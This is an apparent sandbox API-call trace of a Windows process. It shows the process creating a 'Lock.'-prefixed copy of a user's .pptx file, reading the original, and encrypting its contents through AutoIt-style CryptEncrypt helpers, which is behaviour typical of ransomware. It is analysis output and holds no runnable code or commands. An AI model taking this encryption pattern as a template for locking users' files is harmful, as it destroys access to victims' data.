0x2e54d38 [0266.055] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/Lock.MvKsZ2f3N9SAK.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\lock.mvksz2f3n9sak.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0266.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69bc8 [0266.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0266.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0266.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0266.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0266.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0266.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0266.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0266.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0266.056] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0266.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0266.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0266.056] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0266.056] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0266.056] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0266.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0266.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0266.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0266.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0266.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0266.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0266.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0266.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0266.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0266.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0266.057] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0266.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0266.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0266.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0266.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x125d020 [0266.061] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0266.061] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x53c8, lpOverlapped=0x0) returned 1 [0266.064] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0266.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0266.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0266.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0266.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0266.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x53c8) returned 0x2f16018 [0266.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x125d020 | out: hHeap=0x970000) returned 1 [0266.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0266.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0266.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0266.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0266.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0266.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0266.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0266.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0266.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x53c8) returned 0x2f1b3e8 [0266.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f16018 | out: hHeap=0x970000) returned 1 [0266.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0266.075] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0266.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0266.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0266.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0266.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0266.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x53c8) returned 0x2f16018 [0266.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0266.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f16018 | out: hHeap=0x970000) returned 1 [0266.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0266.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0266.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0266.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0266.075] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0266.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0266.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0266.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0266.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0266.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0266.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0266.075] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0266.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0266.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0266.076] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0266.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0266.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0266.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0266.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ee8 [0266.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0266.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0266.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0266.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0266.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x53c8) returned 0x2f16018 [0266.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0266.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e55078 [0266.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0266.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0266.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0266.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54f88 [0266.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0266.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0266.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0266.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e550d8 [0266.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0266.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0266.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0266.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e517a8 [0266.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0266.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0266.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0266.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0266.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0266.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x53c8) returned 0x2f207b8 [0266.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0266.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0266.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0266.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0266.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0266.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0266.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0266.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0266.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0266.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0266.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0266.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0266.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0266.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0266.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0266.078] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0266.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0266.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0266.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0266.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0266.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0266.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0266.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0266.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0266.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0266.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0266.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0266.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0266.079] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0266.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0266.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0266.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0266.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0266.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0266.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0266.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0266.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0266.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0266.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0266.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0266.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0266.080] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0266.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0266.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0266.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0266.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0266.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0266.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0266.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0266.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0266.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0266.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0266.081] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0266.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0266.081] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0266.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0266.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0266.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0266.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0266.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0266.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0266.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0266.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0266.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0266.081] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0266.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0266.082] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0266.082] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0266.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0266.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0266.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0266.082] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0266.082] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0266.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0266.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0266.082] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0266.082] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0266.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0266.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0266.083] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0266.083] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0266.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0266.083] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0266.083] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0266.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0266.083] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0266.083] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0266.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0266.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0266.084] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.084] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0266.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0266.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0266.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0266.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0266.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0266.084] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0266.084] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0266.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0266.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0266.085] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0266.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0266.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0266.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0266.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0266.085] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0266.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e51e68 [0266.085] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51e68, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0266.086] CryptEncrypt (in: hKey=0xa870d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x53c8, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x53d0) returned 1 